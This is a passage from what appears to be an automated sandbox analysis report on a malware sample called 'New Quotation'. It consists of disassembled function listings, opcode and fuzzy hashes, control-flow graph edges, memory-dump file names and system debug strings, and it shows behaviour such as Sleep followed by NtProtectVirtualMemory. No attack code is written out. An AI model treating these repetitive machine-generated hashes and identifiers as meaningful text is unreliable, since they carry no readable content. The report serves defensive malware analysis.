                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: 120c3d9d686005b1aad53fd2bb7b8b625f6b9e0132331cbad1fff5b9e53c6626
                                                                                                                                                                                          • Instruction ID: bd3ed4a21f89afc1b8a87df76d0a0076b15348fc9c34247b76feedb2498508f5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 120c3d9d686005b1aad53fd2bb7b8b625f6b9e0132331cbad1fff5b9e53c6626
                                                                                                                                                                                          • Instruction Fuzzy Hash: FF90022135100003D9407159551870A401597E1301FD2D415F0404514CD92D889AA223
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: 6a2503f62fd714ee121225d3a754ac7caade290b5d51ff5005348c0e645348f3
                                                                                                                                                                                          • Instruction ID: e71fa1ab9d9940f3f0db8b8f37f51188c4757feb42d97b4a64a86d35fb1a8962
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a2503f62fd714ee121225d3a754ac7caade290b5d51ff5005348c0e645348f3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A90022126180042DA0065694D14B0B001547D0303FD2C519F0144514CC92D88A5A523
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: 0ee5108dbd35399fef36b53988aa5fe6b91e9af3b79ad4f196595c30ef695e0f
                                                                                                                                                                                          • Instruction ID: 0592b4c557ec3bb156a824fd63386d4298a15087fd41fa44f2fea68a657ef00d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ee5108dbd35399fef36b53988aa5fe6b91e9af3b79ad4f196595c30ef695e0f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F90023125140402D9006159491470F001547D0302FD2C415F1154515DC63D8895B573
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812ED0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: bfba7ecfa36c425cfc342be2d7e5073462b6e6affab948d943ee9df9488e3dd0
                                                                                                                                                                                          • Instruction ID: 9a2f55f644e1d4fa565735d57ee88e3e4bc18347a8781c537fc180dc26117825
                                                                                                                                                                                          • Opcode Fuzzy Hash: bfba7ecfa36c425cfc342be2d7e5073462b6e6affab948d943ee9df9488e3dd0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B90022165100042494071698944A0A40156BE1211BD2C525F0988510DC56D88A9A667
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: 7c5618c466c5727ca3f3b7e527e4f9d8cddf5b3e5671cd1254658ff7f9702148
                                                                                                                                                                                          • Instruction ID: 85fd061c8d82ff96dafeec15f87ee048c1305955ee8ab6c8340406e8094a6b7e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c5618c466c5727ca3f3b7e527e4f9d8cddf5b3e5671cd1254658ff7f9702148
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B90026139100442D90061594514B0A001587E1301FD2C419F1054514DC62DCC96B127
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8129F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 125 1d8129f0-1d8129fc LdrInitializeThunk
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: fd7561e16d30e128834a0f0dc802f2407f6c4f2525b52c1a92321ebcd3f42ba8
                                                                                                                                                                                          • Instruction ID: c6d283c5489f3a2e0e22478fdc95a615ab491dce8d5784c79a71dcb9bac03c65
                                                                                                                                                                                          • Opcode Fuzzy Hash: fd7561e16d30e128834a0f0dc802f2407f6c4f2525b52c1a92321ebcd3f42ba8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B900225261000030905A559070460B005647D53517D2C425F1005510CD63988A5A123
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 127 1d812b90-1d812b9c LdrInitializeThunk
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: 98d58460c584a7a177e744a3826fbd47e6b126b274aa6681cb0d1d69a9bec179
                                                                                                                                                                                          • Instruction ID: ad50fc3984c5715075e51c1d2eae1cfdb236cbe1bc178b3a03e7dbf4bf3e8b2a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 98d58460c584a7a177e744a3826fbd47e6b126b274aa6681cb0d1d69a9bec179
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A90023125108802D9106159850474E001547D0301FD6C815F4414618DC6AD88D5B123
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 128 1d812bc0-1d812bcc LdrInitializeThunk
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: a3db5ff4da371946304e2b8c1409219bfc5e6f842a5d660134097444399e95c2
                                                                                                                                                                                          • Instruction ID: 60e9a792263519cfd9921c4766f8bceea8de479f6ca755eef623a981b7af3a21
                                                                                                                                                                                          • Opcode Fuzzy Hash: a3db5ff4da371946304e2b8c1409219bfc5e6f842a5d660134097444399e95c2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C90023125100402D9006599550874A001547E0301FD2D415F5014515EC67D88D5B133
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 126 1d812b10-1d812b1c LdrInitializeThunk
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: 413c0873b88a3eebe35eab4dbf728e41ac9f0f58622a21f5bd16bb47d95708fa
                                                                                                                                                                                          • Instruction ID: 6addd082275779705d02bc8246a5a0b8ba18d0a8a04c4f7e49f2c2fa49234fb9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 413c0873b88a3eebe35eab4dbf728e41ac9f0f58622a21f5bd16bb47d95708fa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B90023125100802D9807159450474E001547D1301FD2C419F0015614DCA2D8A9DB7A3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 016726F1 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 236threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 14 16726f1-167270e TerminateThread 15 1672714-1672754 call 166061e 14->15 16 16613e3-16613e8 14->16 29 16728d3-16728eb 15->29 30 167275a-167279d 15->30 17 166ef59-166ef63 16->17 19 166ef65-166ef92 17->19 20 166efca-166efec 17->20 22 166ef94-166ef96 19->22 23 166f00e-166f018 19->23 27 166f005-166f00a 20->27 22->27 28 166ef98-166efbf 22->28 25 166f096-166f0ab 23->25 26 166f01a-166f039 23->26 34 166f0ae-166f0b0 25->34 35 166f08b-166f094 25->35 33 166f03d-166f04e 26->33 27->23 28->33 29->17 31 16728f1-16728fc 29->31 30->29 36 16727a3-16727a7 30->36 37 166f050-166f052 33->37 38 166f0cb-166f0cf 33->38 39 166f0c2-166f0c8 34->39 35->25 36->29 40 16727ad-16727b1 36->40 37->39 41 166f054-166f06b 37->41 38->14 39->38 40->29 42 16727b7-16727bb 40->42 41->35 42->29 43 16727c1-16727c5 42->43 43->29 44 16727cb-16727cf 43->44 44->29 45 16727d5-16727e3 44->45 45->29 46 16727e9-167283f 45->46 48 1672840-1672853 46->48 49 1672855-167285f 48->49 50 1672864-16728d0 48->50 49->29 51 1672861-1672862 49->51 51->48
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49634876945.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1660000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: TerminateThread
                                                                                                                                                                                          • String ID: :DA0
                                                                                                                                                                                          • API String ID: 1852365436-117091373
                                                                                                                                                                                          • Opcode ID: 663b222b70dbd3bc47313c5ace6f13aa5228d6275061ed4b917ed2b98e64866d
                                                                                                                                                                                          • Instruction ID: 8fb1371fea760e8bec6115c40ef556963dbb7a1679982ee2a612dec075c661e5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 663b222b70dbd3bc47313c5ace6f13aa5228d6275061ed4b917ed2b98e64866d
                                                                                                                                                                                          • Instruction Fuzzy Hash: D671CB361042958FC712CFA8DDE87E63BA6EF42324F2542AED4844B563C33689CBCB41
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0167299D Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45sleepCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 53 167299d-1672a24 call 1672cdf 57 1672a26 53->57 58 1672a2b-1672a72 53->58 57->58 60 1672a74-1672a79 Sleep 58->60 61 1672a81-1672af8 NtProtectVirtualMemory call 1672cdf 58->61 60->61 66 1672aff 61->66 66->66
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49634876945.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1660000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                          • String ID: k!K
                                                                                                                                                                                          • API String ID: 3472027048-3744200736
                                                                                                                                                                                          • Opcode ID: a362347e0700a9bc07f7a1612f9909f31ceab1f953aac22bcb2cd2a2b67ae88f
                                                                                                                                                                                          • Instruction ID: 006b117a7d55b7b4db489cf3c7af0aa3ac58476c878cf816506d984c40c2ecd1
                                                                                                                                                                                          • Opcode Fuzzy Hash: a362347e0700a9bc07f7a1612f9909f31ceab1f953aac22bcb2cd2a2b67ae88f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2801F761A693C15FD321DB314AFCB817E958F19708F1E48CEC9805F68FE221D48E8212
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 01672990 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 34sleepCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 67 1672990-1672a24 call 1667b46 call 1672cdf 73 1672a26 67->73 74 1672a2b-1672a72 67->74 73->74 76 1672a74-1672a79 Sleep 74->76 77 1672a81-1672af8 NtProtectVirtualMemory call 1672cdf 74->77 76->77 82 1672aff 77->82 82->82
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49634876945.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1660000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                          • String ID: k!K
                                                                                                                                                                                          • API String ID: 3472027048-3744200736
                                                                                                                                                                                          • Opcode ID: 5977f4420b757a44f7cf12c61a1c0331c41c6d97570e9de49bab0457b87cf0fc
                                                                                                                                                                                          • Instruction ID: d11af6e83f156815a8a77734ed5266e4c00d540206eb2a29d6cee5a2e0c3dbc7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5977f4420b757a44f7cf12c61a1c0331c41c6d97570e9de49bab0457b87cf0fc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 49F02E642543028FE754FF748EFDB9B76A29F08349F16896DDF464B19BD720C485C501
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 121 1d812b2a-1d812b2f 122 1d812b31-1d812b38 121->122 123 1d812b3f-1d812b46 LdrInitializeThunk 121->123
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: 4a6fe387cf9b77ab9f59a1856aed73ed48df6e64c0447605d6d491d4be28fe51
                                                                                                                                                                                          • Instruction ID: a84da4ab08504ae2621b8c900b060832708781215b6c17256189d4500c209bba
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a6fe387cf9b77ab9f59a1856aed73ed48df6e64c0447605d6d491d4be28fe51
                                                                                                                                                                                          • Instruction Fuzzy Hash: 49B09B719414C5CEDA01D760470871B791067D0701F57C455F1460641E473CC0D5F277
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 01672A31 Relevance: 1.3, APIs: 1, Instructions: 22sleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49634876945.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1660000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                          • Opcode ID: 6c62400df5a79bb357b110d83d539044409b79d6df3cb27274398ce0fc54229e
                                                                                                                                                                                          • Instruction ID: f8ebda914ddb88be95508e7fba16ef076ddeeacd10133ef25998a2a01e629450
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c62400df5a79bb357b110d83d539044409b79d6df3cb27274398ce0fc54229e
                                                                                                                                                                                          • Instruction Fuzzy Hash: BBE0B862E193C06BC3628F32092CA80BF488F16718F2E48CFD0C06E58FD122914EC366
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 1D888890 Relevance: 37.8, Strings: 30, Instructions: 268COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • *** then kb to get the faulting stack, xrefs: 1D888B4C
                                                                                                                                                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 1D888AA6
                                                                                                                                                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 1D888944
                                                                                                                                                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 1D8889BF
                                                                                                                                                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 1D88890C
                                                                                                                                                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 1D888A06
                                                                                                                                                                                          • The instruction at %p tried to %s , xrefs: 1D888AE6
                                                                                                                                                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 1D8889CB
                                                                                                                                                                                          • an invalid address, %p, xrefs: 1D888AFF
                                                                                                                                                                                          • Go determine why that thread has not released the critical section., xrefs: 1D8889F5
                                                                                                                                                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 1D888935
                                                                                                                                                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 1D888ABF
                                                                                                                                                                                          • The resource is owned exclusively by thread %p, xrefs: 1D8889A4
                                                                                                                                                                                          • <unknown>, xrefs: 1D8888AE, 1D888901, 1D888980, 1D8889C9, 1D888A47, 1D888ABE
                                                                                                                                                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 1D888953
                                                                                                                                                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 1D888B6F
                                                                                                                                                                                          • *** enter .cxr %p for the context, xrefs: 1D888B3D
                                                                                                                                                                                          • The instruction at %p referenced memory at %p., xrefs: 1D888A62
                                                                                                                                                                                          • This failed because of error %Ix., xrefs: 1D888A76
                                                                                                                                                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 1D888AAD
                                                                                                                                                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 1D888982
                                                                                                                                                                                          • read from, xrefs: 1D888ADD, 1D888AE2
                                                                                                                                                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 1D888923
                                                                                                                                                                                          • a NULL pointer, xrefs: 1D888B10
                                                                                                                                                                                          • The critical section is owned by thread %p., xrefs: 1D8889E9
                                                                                                                                                                                          • *** enter .exr %p for the exception record, xrefs: 1D888B21
                                                                                                                                                                                          • *** Inpage error in %ws:%s, xrefs: 1D888A48
                                                                                                                                                                                          • write to, xrefs: 1D888AD6
                                                                                                                                                                                          • The resource is owned shared by %d threads, xrefs: 1D8889AE
                                                                                                                                                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 1D888AB4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                                                                                          • API String ID: 0-108210295
                                                                                                                                                                                          • Opcode ID: eb8fcec9ad126d92636c2330e8841e9eccf0d7fef12247410afc29e35f6d1f24
                                                                                                                                                                                          • Instruction ID: 03fefe3b3ef27fba8dbe42f7cff24e18e39a29a34a03d866f0ca9379dae02a44
                                                                                                                                                                                          • Opcode Fuzzy Hash: eb8fcec9ad126d92636c2330e8841e9eccf0d7fef12247410afc29e35f6d1f24
                                                                                                                                                                                          • Instruction Fuzzy Hash: EF81DF79914115FFCB168F08FC44EBA3B35EF86764F028898F1046B2A7D729A551CBA3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D851FC9 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 79%
